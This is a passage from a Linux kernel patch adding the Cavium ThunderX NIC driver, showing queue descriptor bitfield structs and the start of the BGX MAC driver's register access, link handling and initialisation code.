CQE_RX_ERR_L3_PCLP = 0x47, + CQE_RX_ERR_L4_MAL = 0x61, + CQE_RX_ERR_L4_CHK = 0x62, + CQE_RX_ERR_UDP_LEN = 0x63, + CQE_RX_ERR_L4_PORT = 0x64, + CQE_RX_ERR_TCP_FLAG = 0x65, + CQE_RX_ERR_TCP_OFFSET = 0x66, + CQE_RX_ERR_L4_PCLP = 0x67, + CQE_RX_ERR_RBDR_TRUNC = 0x70, +}; + +struct cqe_rx_t { +#if defined(__BIG_ENDIAN_BITFIELD) + u64 cqe_type:4; /* W0 */ + u64 stdn_fault:1; + u64 rsvd0:1; + u64 rq_qs:7; + u64 rq_idx:3; + u64 rsvd1:12; + u64 rss_alg:4; + u64 rsvd2:4; + u64 rb_cnt:4; + u64 vlan_found:1; + u64 vlan_stripped:1; + u64 vlan2_found:1; + u64 vlan2_stripped:1; + u64 l4_type:4; + u64 l3_type:4; + u64 l2_present:1; + u64 err_level:3; + u64 err_opcode:8; + + u64 pkt_len:16; /* W1 */ + u64 l2_ptr:8; + u64 l3_ptr:8; + u64 l4_ptr:8; + u64 cq_pkt_len:8; + u64 align_pad:3; + u64 rsvd3:1; + u64 chan:12; + + u64 rss_tag:32; /* W2 */ + u64 vlan_tci:16; + u64 vlan_ptr:8; + u64 vlan2_ptr:8; + + u64 rb3_sz:16; /* W3 */ + u64 rb2_sz:16; + u64 rb1_sz:16; + u64 rb0_sz:16; + + u64 rb7_sz:16; /* W4 */ + u64 rb6_sz:16; + u64 rb5_sz:16; + u64 rb4_sz:16; + + u64 rb11_sz:16; /* W5 */ + u64 rb10_sz:16; + u64 rb9_sz:16; + u64 rb8_sz:16; +#elif defined(__LITTLE_ENDIAN_BITFIELD) + u64 err_opcode:8; + u64 err_level:3; + u64 l2_present:1; + u64 l3_type:4; + u64 l4_type:4; + u64 vlan2_stripped:1; + u64 vlan2_found:1; + u64 vlan_stripped:1; + u64 vlan_found:1; + u64 rb_cnt:4; + u64 rsvd2:4; + u64 rss_alg:4; + u64 rsvd1:12; + u64 rq_idx:3; + u64 rq_qs:7; + u64 rsvd0:1; + u64 stdn_fault:1; + u64 cqe_type:4; /* W0 */ + u64 chan:12; + u64 rsvd3:1; + u64 align_pad:3; + u64 cq_pkt_len:8; + u64 l4_ptr:8; + u64 l3_ptr:8; + u64 l2_ptr:8; + u64 pkt_len:16; /* W1 */ + u64 vlan2_ptr:8; + u64 vlan_ptr:8; + u64 vlan_tci:16; + u64 rss_tag:32; /* W2 */ + u64 rb0_sz:16; + u64 rb1_sz:16; + u64 rb2_sz:16; + u64 rb3_sz:16; /* W3 */ + u64 rb4_sz:16; + u64 rb5_sz:16; + u64 rb6_sz:16; + u64 rb7_sz:16; /* W4 */ + u64 rb8_sz:16; + u64 rb9_sz:16; + u64 rb10_sz:16; + u64 rb11_sz:16; /* W5 */ +#endif + u64 rb0_ptr:64; + u64 rb1_ptr:64; + u64 rb2_ptr:64; + u64 rb3_ptr:64; + u64 rb4_ptr:64; + u64 rb5_ptr:64; + u64 rb6_ptr:64; + u64 rb7_ptr:64; + u64 rb8_ptr:64; + u64 rb9_ptr:64; + u64 rb10_ptr:64; + u64 rb11_ptr:64; +}; + +struct cqe_rx_tcp_err_t { +#if defined(__BIG_ENDIAN_BITFIELD) + u64 cqe_type:4; /* W0 */ + u64 rsvd0:60; + + u64 rsvd1:4; /* W1 */ + u64 partial_first:1; + u64 rsvd2:27; + u64 rbdr_bytes:8; + u64 rsvd3:24; +#elif defined(__LITTLE_ENDIAN_BITFIELD) + u64 rsvd0:60; + u64 cqe_type:4; + + u64 rsvd3:24; + u64 rbdr_bytes:8; + u64 rsvd2:27; + u64 partial_first:1; + u64 rsvd1:4; +#endif +}; + +struct cqe_rx_tcp_t { +#if defined(__BIG_ENDIAN_BITFIELD) + u64 cqe_type:4; /* W0 */ + u64 rsvd0:52; + u64 cq_tcp_status:8; + + u64 rsvd1:32; /* W1 */ + u64 tcp_cntx_bytes:8; + u64 rsvd2:8; + u64 tcp_err_bytes:16; +#elif defined(__LITTLE_ENDIAN_BITFIELD) + u64 cq_tcp_status:8; + u64 rsvd0:52; + u64 cqe_type:4; /* W0 */ + + u64 tcp_err_bytes:16; + u64 rsvd2:8; + u64 tcp_cntx_bytes:8; + u64 rsvd1:32; /* W1 */ +#endif +}; + +struct cqe_send_t { +#if defined(__BIG_ENDIAN_BITFIELD) + u64 cqe_type:4; /* W0 */ + u64 rsvd0:4; + u64 sqe_ptr:16; + u64 rsvd1:4; + u64 rsvd2:10; + u64 sq_qs:7; + u64 sq_idx:3; + u64 rsvd3:8; + u64 send_status:8; + + u64 ptp_timestamp:64; /* W1 */ +#elif defined(__LITTLE_ENDIAN_BITFIELD) + u64 send_status:8; + u64 rsvd3:8; + u64 sq_idx:3; + u64 sq_qs:7; + u64 rsvd2:10; + u64 rsvd1:4; + u64 sqe_ptr:16; + u64 rsvd0:4; + u64 cqe_type:4; /* W0 */ + + u64 ptp_timestamp:64; /* W1 */ +#endif +}; + +union cq_desc_t { + u64 u[64]; + 
struct cqe_send_t snd_hdr; + struct cqe_rx_t rx_hdr; + struct cqe_rx_tcp_t rx_tcp_hdr; + struct cqe_rx_tcp_err_t rx_tcp_err_hdr; +}; + +struct rbdr_entry_t { +#if defined(__BIG_ENDIAN_BITFIELD) + u64 rsvd0:15; + u64 buf_addr:42; + u64 cache_align:7; +#elif defined(__LITTLE_ENDIAN_BITFIELD) + u64 cache_align:7; + u64 buf_addr:42; + u64 rsvd0:15; +#endif +}; + +/* TCP reassembly context */ +struct rbe_tcp_cnxt_t { +#if defined(__BIG_ENDIAN_BITFIELD) + u64 tcp_pkt_cnt:12; + u64 rsvd1:4; + u64 align_hdr_bytes:4; + u64 align_ptr_bytes:4; + u64 ptr_bytes:16; + u64 rsvd2:24; + u64 cqe_type:4; + u64 rsvd0:54; + u64 tcp_end_reason:2; + u64 tcp_status:4; +#elif defined(__LITTLE_ENDIAN_BITFIELD) + u64 tcp_status:4; + u64 tcp_end_reason:2; + u64 rsvd0:54; + u64 cqe_type:4; + u64 rsvd2:24; + u64 ptr_bytes:16; + u64 align_ptr_bytes:4; + u64 align_hdr_bytes:4; + u64 rsvd1:4; + u64 tcp_pkt_cnt:12; +#endif +}; + +/* Always Big endian */ +struct rx_hdr_t { + u64 opaque:32; + u64 rss_flow:8; + u64 skip_length:6; + u64 disable_rss:1; + u64 disable_tcp_reassembly:1; + u64 nodrop:1; + u64 dest_alg:2; + u64 rsvd0:2; + u64 dest_rq:11; +}; + +enum send_l4_csum_type { + SEND_L4_CSUM_DISABLE = 0x00, + SEND_L4_CSUM_UDP = 0x01, + SEND_L4_CSUM_TCP = 0x02, + SEND_L4_CSUM_SCTP = 0x03, +}; + +enum send_crc_alg { + SEND_CRCALG_CRC32 = 0x00, + SEND_CRCALG_CRC32C = 0x01, + SEND_CRCALG_ICRC = 0x02, +}; + +enum send_load_type { + SEND_LD_TYPE_LDD = 0x00, + SEND_LD_TYPE_LDT = 0x01, + SEND_LD_TYPE_LDWB = 0x02, +}; + +enum send_mem_alg_type { + SEND_MEMALG_SET = 0x00, + SEND_MEMALG_ADD = 0x08, + SEND_MEMALG_SUB = 0x09, + SEND_MEMALG_ADDLEN = 0x0A, + SEND_MEMALG_SUBLEN = 0x0B, +}; + +enum send_mem_dsz_type { + SEND_MEMDSZ_B64 = 0x00, + SEND_MEMDSZ_B32 = 0x01, + SEND_MEMDSZ_B8 = 0x03, +}; + +enum sq_subdesc_type { + SQ_DESC_TYPE_INVALID = 0x00, + SQ_DESC_TYPE_HEADER = 0x01, + SQ_DESC_TYPE_CRC = 0x02, + SQ_DESC_TYPE_IMMEDIATE = 0x03, + SQ_DESC_TYPE_GATHER = 0x04, + SQ_DESC_TYPE_MEMORY = 0x05, +}; + +struct sq_crc_subdesc { +#if defined(__BIG_ENDIAN_BITFIELD) + u64 rsvd1:32; + u64 crc_ival:32; + u64 subdesc_type:4; + u64 crc_alg:2; + u64 rsvd0:10; + u64 crc_insert_pos:16; + u64 hdr_start:16; + u64 crc_len:16; +#elif defined(__LITTLE_ENDIAN_BITFIELD) + u64 crc_len:16; + u64 hdr_start:16; + u64 crc_insert_pos:16; + u64 rsvd0:10; + u64 crc_alg:2; + u64 subdesc_type:4; + u64 crc_ival:32; + u64 rsvd1:32; +#endif +}; + +struct sq_gather_subdesc { +#if defined(__BIG_ENDIAN_BITFIELD) + u64 subdesc_type:4; /* W0 */ + u64 ld_type:2; + u64 rsvd0:42; + u64 size:16; + + u64 rsvd1:15; /* W1 */ + u64 addr:49; +#elif defined(__LITTLE_ENDIAN_BITFIELD) + u64 size:16; + u64 rsvd0:42; + u64 ld_type:2; + u64 subdesc_type:4; /* W0 */ + + u64 addr:49; + u64 rsvd1:15; /* W1 */ +#endif +}; + +/* SQ immediate subdescriptor */ +struct sq_imm_subdesc { +#if defined(__BIG_ENDIAN_BITFIELD) + u64 subdesc_type:4; /* W0 */ + u64 rsvd0:46; + u64 len:14; + + u64 data:64; /* W1 */ +#elif defined(__LITTLE_ENDIAN_BITFIELD) + u64 len:14; + u64 rsvd0:46; + u64 subdesc_type:4; /* W0 */ + + u64 data:64; /* W1 */ +#endif +}; + +struct sq_mem_subdesc { +#if defined(__BIG_ENDIAN_BITFIELD) + u64 subdesc_type:4; /* W0 */ + u64 mem_alg:4; + u64 mem_dsz:2; + u64 wmem:1; + u64 rsvd0:21; + u64 offset:32; + + u64 rsvd1:15; /* W1 */ + u64 addr:49; +#elif defined(__LITTLE_ENDIAN_BITFIELD) + u64 offset:32; + u64 rsvd0:21; + u64 wmem:1; + u64 mem_dsz:2; + u64 mem_alg:4; + u64 subdesc_type:4; /* W0 */ + + u64 addr:49; + u64 rsvd1:15; /* W1 */ +#endif +}; + +struct sq_hdr_subdesc { +#if 
defined(__BIG_ENDIAN_BITFIELD) + u64 subdesc_type:4; + u64 tso:1; + u64 post_cqe:1; /* Post CQE on no error also */ + u64 dont_send:1; + u64 tstmp:1; + u64 subdesc_cnt:8; + u64 csum_l4:2; + u64 csum_l3:1; + u64 rsvd0:5; + u64 l4_offset:8; + u64 l3_offset:8; + u64 rsvd1:4; + u64 tot_len:20; /* W0 */ + + u64 tso_sdc_cont:8; + u64 tso_sdc_first:8; + u64 tso_l4_offset:8; + u64 tso_flags_last:12; + u64 tso_flags_first:12; + u64 rsvd2:2; + u64 tso_max_paysize:14; /* W1 */ +#elif defined(__LITTLE_ENDIAN_BITFIELD) + u64 tot_len:20; + u64 rsvd1:4; + u64 l3_offset:8; + u64 l4_offset:8; + u64 rsvd0:5; + u64 csum_l3:1; + u64 csum_l4:2; + u64 subdesc_cnt:8; + u64 tstmp:1; + u64 dont_send:1; + u64 post_cqe:1; /* Post CQE on no error also */ + u64 tso:1; + u64 subdesc_type:4; /* W0 */ + + u64 tso_max_paysize:14; + u64 rsvd2:2; + u64 tso_flags_first:12; + u64 tso_flags_last:12; + u64 tso_l4_offset:8; + u64 tso_sdc_first:8; + u64 tso_sdc_cont:8; /* W1 */ +#endif +}; + +/* Queue config register formats */ +struct rq_cfg { +#if defined(__BIG_ENDIAN_BITFIELD) + u64 reserved_2_63:62; + u64 ena:1; + u64 tcp_ena:1; +#elif defined(__LITTLE_ENDIAN_BITFIELD) + u64 tcp_ena:1; + u64 ena:1; + u64 reserved_2_63:62; +#endif +}; + +struct cq_cfg { +#if defined(__BIG_ENDIAN_BITFIELD) + u64 reserved_43_63:21; + u64 ena:1; + u64 reset:1; + u64 caching:1; + u64 reserved_35_39:5; + u64 qsize:3; + u64 reserved_25_31:7; + u64 avg_con:9; + u64 reserved_0_15:16; +#elif defined(__LITTLE_ENDIAN_BITFIELD) + u64 reserved_0_15:16; + u64 avg_con:9; + u64 reserved_25_31:7; + u64 qsize:3; + u64 reserved_35_39:5; + u64 caching:1; + u64 reset:1; + u64 ena:1; + u64 reserved_43_63:21; +#endif +}; + +struct sq_cfg { +#if defined(__BIG_ENDIAN_BITFIELD) + u64 reserved_20_63:44; + u64 ena:1; + u64 reserved_18_18:1; + u64 reset:1; + u64 ldwb:1; + u64 reserved_11_15:5; + u64 qsize:3; + u64 reserved_3_7:5; + u64 tstmp_bgx_intf:3; +#elif defined(__LITTLE_ENDIAN_BITFIELD) + u64 tstmp_bgx_intf:3; + u64 reserved_3_7:5; + u64 qsize:3; + u64 reserved_11_15:5; + u64 ldwb:1; + u64 reset:1; + u64 reserved_18_18:1; + u64 ena:1; + u64 reserved_20_63:44; +#endif +}; + +struct rbdr_cfg { +#if defined(__BIG_ENDIAN_BITFIELD) + u64 reserved_45_63:19; + u64 ena:1; + u64 reset:1; + u64 ldwb:1; + u64 reserved_36_41:6; + u64 qsize:4; + u64 reserved_25_31:7; + u64 avg_con:9; + u64 reserved_12_15:4; + u64 lines:12; +#elif defined(__LITTLE_ENDIAN_BITFIELD) + u64 lines:12; + u64 reserved_12_15:4; + u64 avg_con:9; + u64 reserved_25_31:7; + u64 qsize:4; + u64 reserved_36_41:6; + u64 ldwb:1; + u64 reset:1; + u64 ena: 1; + u64 reserved_45_63:19; +#endif +}; + +struct qs_cfg { +#if defined(__BIG_ENDIAN_BITFIELD) + u64 reserved_32_63:32; + u64 ena:1; + u64 reserved_27_30:4; + u64 sq_ins_ena:1; + u64 sq_ins_pos:6; + u64 lock_ena:1; + u64 lock_viol_cqe_ena:1; + u64 send_tstmp_ena:1; + u64 be:1; + u64 reserved_7_15:9; + u64 vnic:7; +#elif defined(__LITTLE_ENDIAN_BITFIELD) + u64 vnic:7; + u64 reserved_7_15:9; + u64 be:1; + u64 send_tstmp_ena:1; + u64 lock_viol_cqe_ena:1; + u64 lock_ena:1; + u64 sq_ins_pos:6; + u64 sq_ins_ena:1; + u64 reserved_27_30:4; + u64 ena:1; + u64 reserved_32_63:32; +#endif +}; + +#endif /* Q_STRUCT_H */ diff --git a/drivers/net/ethernet/cavium/thunder/thunder_bgx.c b/drivers/net/ethernet/cavium/thunder/thunder_bgx.c new file mode 100644 index 000000000000..020e11cf3fdd --- /dev/null +++ b/drivers/net/ethernet/cavium/thunder/thunder_bgx.c @@ -0,0 +1,966 @@ +/* + * Copyright (C) 2015 Cavium, Inc. 
+ * + * This program is free software; you can redistribute it and/or modify it + * under the terms of version 2 of the GNU General Public License + * as published by the Free Software Foundation. + */ + +#include +#include +#include +#include +#include +#include +#include +#include +#include + +#include "nic_reg.h" +#include "nic.h" +#include "thunder_bgx.h" + +#define DRV_NAME "thunder-BGX" +#define DRV_VERSION "1.0" + +struct lmac { + struct bgx *bgx; + int dmac; + unsigned char mac[ETH_ALEN]; + bool link_up; + int lmacid; /* ID within BGX */ + int lmacid_bd; /* ID on board */ + struct net_device netdev; + struct phy_device *phydev; + unsigned int last_duplex; + unsigned int last_link; + unsigned int last_speed; + bool is_sgmii; + struct delayed_work dwork; + struct workqueue_struct *check_link; +} lmac; + +struct bgx { + u8 bgx_id; + u8 qlm_mode; + struct lmac lmac[MAX_LMAC_PER_BGX]; + int lmac_count; + int lmac_type; + int lane_to_sds; + int use_training; + void __iomem *reg_base; + struct pci_dev *pdev; +} bgx; + +struct bgx *bgx_vnic[MAX_BGX_THUNDER]; +static int lmac_count; /* Total no of LMACs in system */ + +static int bgx_xaui_check_link(struct lmac *lmac); + +/* Supported devices */ +static const struct pci_device_id bgx_id_table[] = { + { PCI_DEVICE(PCI_VENDOR_ID_CAVIUM, PCI_DEVICE_ID_THUNDER_BGX) }, + { 0, } /* end of table */ +}; + +MODULE_AUTHOR("Cavium Inc"); +MODULE_DESCRIPTION("Cavium Thunder BGX/MAC Driver"); +MODULE_LICENSE("GPL v2"); +MODULE_VERSION(DRV_VERSION); +MODULE_DEVICE_TABLE(pci, bgx_id_table); + +/* The Cavium ThunderX network controller can *only* be found in SoCs + * containing the ThunderX ARM64 CPU implementation. All accesses to the device + * registers on this platform are implicitly strongly ordered with respect + * to memory accesses. So writeq_relaxed() and readq_relaxed() are safe to use + * with no memory barriers in this driver. The readq()/writeq() functions add + * explicit ordering operation which in this case are redundant, and only + * add overhead. 
+ */ + +/* Register read/write APIs */ +static u64 bgx_reg_read(struct bgx *bgx, u8 lmac, u64 offset) +{ + void __iomem *addr = bgx->reg_base + ((u32)lmac << 20) + offset; + + return readq_relaxed(addr); +} + +static void bgx_reg_write(struct bgx *bgx, u8 lmac, u64 offset, u64 val) +{ + void __iomem *addr = bgx->reg_base + ((u32)lmac << 20) + offset; + + writeq_relaxed(val, addr); +} + +static void bgx_reg_modify(struct bgx *bgx, u8 lmac, u64 offset, u64 val) +{ + void __iomem *addr = bgx->reg_base + ((u32)lmac << 20) + offset; + + writeq_relaxed(val | readq_relaxed(addr), addr); +} + +static int bgx_poll_reg(struct bgx *bgx, u8 lmac, u64 reg, u64 mask, bool zero) +{ + int timeout = 100; + u64 reg_val; + + while (timeout) { + reg_val = bgx_reg_read(bgx, lmac, reg); + if (zero && !(reg_val & mask)) + return 0; + if (!zero && (reg_val & mask)) + return 0; + usleep_range(1000, 2000); + timeout--; + } + return 1; +} + +/* Return number of BGX present in HW */ +unsigned bgx_get_map(int node) +{ + int i; + unsigned map = 0; + + for (i = 0; i < MAX_BGX_PER_CN88XX; i++) { + if (bgx_vnic[(node * MAX_BGX_PER_CN88XX) + i]) + map |= (1 << i); + } + + return map; +} +EXPORT_SYMBOL(bgx_get_map); + +/* Return number of LMAC configured for this BGX */ +int bgx_get_lmac_count(int node, int bgx_idx) +{ + struct bgx *bgx; + + bgx = bgx_vnic[(node * MAX_BGX_PER_CN88XX) + bgx_idx]; + if (bgx) + return bgx->lmac_count; + + return 0; +} +EXPORT_SYMBOL(bgx_get_lmac_count); + +/* Returns the current link status of LMAC */ +void bgx_get_lmac_link_state(int node, int bgx_idx, int lmacid, void *status) +{ + struct bgx_link_status *link = (struct bgx_link_status *)status; + struct bgx *bgx; + struct lmac *lmac; + + bgx = bgx_vnic[(node * MAX_BGX_PER_CN88XX) + bgx_idx]; + if (!bgx) + return; + + lmac = &bgx->lmac[lmacid]; + link->link_up = lmac->link_up; + link->duplex = lmac->last_duplex; + link->speed = lmac->last_speed; +} +EXPORT_SYMBOL(bgx_get_lmac_link_state); + +const char *bgx_get_lmac_mac(int node, int bgx_idx, int lmacid) +{ + struct bgx *bgx = bgx_vnic[(node * MAX_BGX_PER_CN88XX) + bgx_idx]; + + if (bgx) + return bgx->lmac[lmacid].mac; + + return NULL; +} +EXPORT_SYMBOL(bgx_get_lmac_mac); + +void bgx_set_lmac_mac(int node, int bgx_idx, int lmacid, const char *mac) +{ + struct bgx *bgx = bgx_vnic[(node * MAX_BGX_PER_CN88XX) + bgx_idx]; + + if (!bgx) + return; + + ether_addr_copy(bgx->lmac[lmacid].mac, mac); +} +EXPORT_SYMBOL(bgx_set_lmac_mac); + +static void bgx_sgmii_change_link_state(struct lmac *lmac) +{ + struct bgx *bgx = lmac->bgx; + u64 cmr_cfg; + u64 port_cfg = 0; + u64 misc_ctl = 0; + + cmr_cfg = bgx_reg_read(bgx, lmac->lmacid, BGX_CMRX_CFG); + cmr_cfg &= ~CMR_EN; + bgx_reg_write(bgx, lmac->lmacid, BGX_CMRX_CFG, cmr_cfg); + + port_cfg = bgx_reg_read(bgx, lmac->lmacid, BGX_GMP_GMI_PRTX_CFG); + misc_ctl = bgx_reg_read(bgx, lmac->lmacid, BGX_GMP_PCS_MISCX_CTL); + + if (lmac->link_up) { + misc_ctl &= ~PCS_MISC_CTL_GMX_ENO; + port_cfg &= ~GMI_PORT_CFG_DUPLEX; + port_cfg |= (lmac->last_duplex << 2); + } else { + misc_ctl |= PCS_MISC_CTL_GMX_ENO; + } + + switch (lmac->last_speed) { + case 10: + port_cfg &= ~GMI_PORT_CFG_SPEED; /* speed 0 */ + port_cfg |= GMI_PORT_CFG_SPEED_MSB; /* speed_msb 1 */ + port_cfg &= ~GMI_PORT_CFG_SLOT_TIME; /* slottime 0 */ + misc_ctl &= ~PCS_MISC_CTL_SAMP_PT_MASK; + misc_ctl |= 50; /* samp_pt */ + bgx_reg_write(bgx, lmac->lmacid, BGX_GMP_GMI_TXX_SLOT, 64); + bgx_reg_write(bgx, lmac->lmacid, BGX_GMP_GMI_TXX_BURST, 0); + break; + case 100: + port_cfg &= ~GMI_PORT_CFG_SPEED; /* 
speed 0 */ + port_cfg &= ~GMI_PORT_CFG_SPEED_MSB; /* speed_msb 0 */ + port_cfg &= ~GMI_PORT_CFG_SLOT_TIME; /* slottime 0 */ + misc_ctl &= ~PCS_MISC_CTL_SAMP_PT_MASK; + misc_ctl |= 5; /* samp_pt */ + bgx_reg_write(bgx, lmac->lmacid, BGX_GMP_GMI_TXX_SLOT, 64); + bgx_reg_write(bgx, lmac->lmacid, BGX_GMP_GMI_TXX_BURST, 0); + break; + case 1000: + port_cfg |= GMI_PORT_CFG_SPEED; /* speed 1 */ + port_cfg &= ~GMI_PORT_CFG_SPEED_MSB; /* speed_msb 0 */ + port_cfg |= GMI_PORT_CFG_SLOT_TIME; /* slottime 1 */ + misc_ctl &= ~PCS_MISC_CTL_SAMP_PT_MASK; + misc_ctl |= 1; /* samp_pt */ + bgx_reg_write(bgx, lmac->lmacid, BGX_GMP_GMI_TXX_SLOT, 512); + if (lmac->last_duplex) + bgx_reg_write(bgx, lmac->lmacid, + BGX_GMP_GMI_TXX_BURST, 0); + else + bgx_reg_write(bgx, lmac->lmacid, + BGX_GMP_GMI_TXX_BURST, 8192); + break; + default: + break; + } + bgx_reg_write(bgx, lmac->lmacid, BGX_GMP_PCS_MISCX_CTL, misc_ctl); + bgx_reg_write(bgx, lmac->lmacid, BGX_GMP_GMI_PRTX_CFG, port_cfg); + + port_cfg = bgx_reg_read(bgx, lmac->lmacid, BGX_GMP_GMI_PRTX_CFG); + + /* renable lmac */ + cmr_cfg |= CMR_EN; + bgx_reg_write(bgx, lmac->lmacid, BGX_CMRX_CFG, cmr_cfg); +} + +void bgx_lmac_handler(struct net_device *netdev) +{ + struct lmac *lmac = container_of(netdev, struct lmac, netdev); + struct phy_device *phydev = lmac->phydev; + int link_changed = 0; + + if (!lmac) + return; + + if (!phydev->link && lmac->last_link) + link_changed = -1; + + if (phydev->link && + (lmac->last_duplex != phydev->duplex || + lmac->last_link != phydev->link || + lmac->last_speed != phydev->speed)) { + link_changed = 1; + } + + lmac->last_link = phydev->link; + lmac->last_speed = phydev->speed; + lmac->last_duplex = phydev->duplex; + + if (!link_changed) + return; + + if (link_changed > 0) + lmac->link_up = true; + else + lmac->link_up = false; + + if (lmac->is_sgmii) + bgx_sgmii_change_link_state(lmac); + else + bgx_xaui_check_link(lmac); +} + +u64 bgx_get_rx_stats(int node, int bgx_idx, int lmac, int idx) +{ + struct bgx *bgx; + + bgx = bgx_vnic[(node * MAX_BGX_PER_CN88XX) + bgx_idx]; + if (!bgx) + return 0; + + if (idx > 8) + lmac = 0; + return bgx_reg_read(bgx, lmac, BGX_CMRX_RX_STAT0 + (idx * 8)); +} +EXPORT_SYMBOL(bgx_get_rx_stats); + +u64 bgx_get_tx_stats(int node, int bgx_idx, int lmac, int idx) +{ + struct bgx *bgx; + + bgx = bgx_vnic[(node * MAX_BGX_PER_CN88XX) + bgx_idx]; + if (!bgx) + return 0; + + return bgx_reg_read(bgx, lmac, BGX_CMRX_TX_STAT0 + (idx * 8)); +} +EXPORT_SYMBOL(bgx_get_tx_stats); + +static void bgx_flush_dmac_addrs(struct bgx *bgx, int lmac) +{ + u64 offset; + + while (bgx->lmac[lmac].dmac > 0) { + offset = ((bgx->lmac[lmac].dmac - 1) * sizeof(u64)) + + (lmac * MAX_DMAC_PER_LMAC * sizeof(u64)); + bgx_reg_write(bgx, 0, BGX_CMR_RX_DMACX_CAM + offset, 0); + bgx->lmac[lmac].dmac--; + } +} + +static int bgx_lmac_sgmii_init(struct bgx *bgx, int lmacid) +{ + u64 cfg; + + bgx_reg_modify(bgx, lmacid, BGX_GMP_GMI_TXX_THRESH, 0x30); + /* max packet size */ + bgx_reg_modify(bgx, lmacid, BGX_GMP_GMI_RXX_JABBER, MAX_FRAME_SIZE); + + /* Disable frame alignment if using preamble */ + cfg = bgx_reg_read(bgx, lmacid, BGX_GMP_GMI_TXX_APPEND); + if (cfg & 1) + bgx_reg_write(bgx, lmacid, BGX_GMP_GMI_TXX_SGMII_CTL, 0); + + /* Enable lmac */ + bgx_reg_modify(bgx, lmacid, BGX_CMRX_CFG, CMR_EN); + + /* PCS reset */ + bgx_reg_modify(bgx, lmacid, BGX_GMP_PCS_MRX_CTL, PCS_MRX_CTL_RESET); + if (bgx_poll_reg(bgx, lmacid, BGX_GMP_PCS_MRX_CTL, + PCS_MRX_CTL_RESET, true)) { + dev_err(&bgx->pdev->dev, "BGX PCS reset not completed\n"); + return -1; + } + 
+ /* power down, reset autoneg, autoneg enable */ + cfg = bgx_reg_read(bgx, lmacid, BGX_GMP_PCS_MRX_CTL); + cfg &= ~PCS_MRX_CTL_PWR_DN; + cfg |= (PCS_MRX_CTL_RST_AN | PCS_MRX_CTL_AN_EN); + bgx_reg_write(bgx, lmacid, BGX_GMP_PCS_MRX_CTL, cfg); + + if (bgx_poll_reg(bgx, lmacid, BGX_GMP_PCS_MRX_STATUS, + PCS_MRX_STATUS_AN_CPT, false)) { + dev_err(&bgx->pdev->dev, "BGX AN_CPT not completed\n"); + return -1; + } + + return 0; +} + +static int bgx_lmac_xaui_init(struct bgx *bgx, int lmacid, int lmac_type) +{ + u64 cfg; + + /* Reset SPU */ + bgx_reg_modify(bgx, lmacid, BGX_SPUX_CONTROL1, SPU_CTL_RESET); + if (bgx_poll_reg(bgx, lmacid, BGX_SPUX_CONTROL1, SPU_CTL_RESET, true)) { + dev_err(&bgx->pdev->dev, "BGX SPU reset not completed\n"); + return -1; + } + + /* Disable LMAC */ + cfg = bgx_reg_read(bgx, lmacid, BGX_CMRX_CFG); + cfg &= ~CMR_EN; + bgx_reg_write(bgx, lmacid, BGX_CMRX_CFG, cfg); + + bgx_reg_modify(bgx, lmacid, BGX_SPUX_CONTROL1, SPU_CTL_LOW_POWER); + /* Set interleaved running disparity for RXAUI */ + if (bgx->lmac_type != BGX_MODE_RXAUI) + bgx_reg_modify(bgx, lmacid, + BGX_SPUX_MISC_CONTROL, SPU_MISC_CTL_RX_DIS); + else + bgx_reg_modify(bgx, lmacid, BGX_SPUX_MISC_CONTROL, + SPU_MISC_CTL_RX_DIS | SPU_MISC_CTL_INTLV_RDISP); + + /* clear all interrupts */ + cfg = bgx_reg_read(bgx, lmacid, BGX_SMUX_RX_INT); + bgx_reg_write(bgx, lmacid, BGX_SMUX_RX_INT, cfg); + cfg = bgx_reg_read(bgx, lmacid, BGX_SMUX_TX_INT); + bgx_reg_write(bgx, lmacid, BGX_SMUX_TX_INT, cfg); + cfg = bgx_reg_read(bgx, lmacid, BGX_SPUX_INT); + bgx_reg_write(bgx, lmacid, BGX_SPUX_INT, cfg); + + if (bgx->use_training) { + bgx_reg_write(bgx, lmacid, BGX_SPUX_BR_PMD_LP_CUP, 0x00); + bgx_reg_write(bgx, lmacid, BGX_SPUX_BR_PMD_LD_CUP, 0x00); + bgx_reg_write(bgx, lmacid, BGX_SPUX_BR_PMD_LD_REP, 0x00); + /* training enable */ + bgx_reg_modify(bgx, lmacid, + BGX_SPUX_BR_PMD_CRTL, SPU_PMD_CRTL_TRAIN_EN); + } + + /* Append FCS to each packet */ + bgx_reg_modify(bgx, lmacid, BGX_SMUX_TX_APPEND, SMU_TX_APPEND_FCS_D); + + /* Disable forward error correction */ + cfg = bgx_reg_read(bgx, lmacid, BGX_SPUX_FEC_CONTROL); + cfg &= ~SPU_FEC_CTL_FEC_EN; + bgx_reg_write(bgx, lmacid, BGX_SPUX_FEC_CONTROL, cfg); + + /* Disable autoneg */ + cfg = bgx_reg_read(bgx, lmacid, BGX_SPUX_AN_CONTROL); + cfg = cfg & ~(SPU_AN_CTL_AN_EN | SPU_AN_CTL_XNP_EN); + bgx_reg_write(bgx, lmacid, BGX_SPUX_AN_CONTROL, cfg); + + cfg = bgx_reg_read(bgx, lmacid, BGX_SPUX_AN_ADV); + if (bgx->lmac_type == BGX_MODE_10G_KR) + cfg |= (1 << 23); + else if (bgx->lmac_type == BGX_MODE_40G_KR) + cfg |= (1 << 24); + else + cfg &= ~((1 << 23) | (1 << 24)); + cfg = cfg & (~((1ULL << 25) | (1ULL << 22) | (1ULL << 12))); + bgx_reg_write(bgx, lmacid, BGX_SPUX_AN_ADV, cfg); + + cfg = bgx_reg_read(bgx, 0, BGX_SPU_DBG_CONTROL); + cfg &= ~SPU_DBG_CTL_AN_ARB_LINK_CHK_EN; + bgx_reg_write(bgx, 0, BGX_SPU_DBG_CONTROL, cfg); + + /* Enable lmac */ + bgx_reg_modify(bgx, lmacid, BGX_CMRX_CFG, CMR_EN); + + cfg = bgx_reg_read(bgx, lmacid, BGX_SPUX_CONTROL1); + cfg &= ~SPU_CTL_LOW_POWER; + bgx_reg_write(bgx, lmacid, BGX_SPUX_CONTROL1, cfg); + + cfg = bgx_reg_read(bgx, lmacid, BGX_SMUX_TX_CTL); + cfg &= ~SMU_TX_CTL_UNI_EN; + cfg |= SMU_TX_CTL_DIC_EN; + bgx_reg_write(bgx, lmacid, BGX_SMUX_TX_CTL, cfg); + + /* take lmac_count into account */ + bgx_reg_modify(bgx, lmacid, BGX_SMUX_TX_THRESH, (0x100 - 1)); + /* max packet size */ + bgx_reg_modify(bgx, lmacid, BGX_SMUX_RX_JABBER, MAX_FRAME_SIZE); + + return 0; +} + +static int bgx_xaui_check_link(struct lmac *lmac) +{ + struct bgx *bgx = lmac->bgx; + int 
